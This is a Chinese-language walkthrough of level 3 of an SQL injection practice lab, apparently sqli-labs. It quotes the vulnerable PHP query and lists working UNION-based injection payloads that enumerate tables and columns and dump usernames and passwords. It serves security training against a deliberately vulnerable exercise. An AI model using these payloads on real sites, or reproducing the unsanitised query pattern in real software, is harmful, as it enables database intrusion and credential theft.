第三关-Less-3:

第三关-Less-3 ：

GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)：

判断注入点：

当我们在输入?id=1'的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号，所以我们需要闭合单引号且也要考虑括号。

这时我们来查看源码的关键部分：

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

这里发现确实是我们的闭合符号不一样

然后根据条件来构造我们的payload：

?id=2')--+

?id=1') order by 3--+

?id=-1') union select 1,2,3--+

?id=-1') union select 1,database(),version()--+

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

注入成功！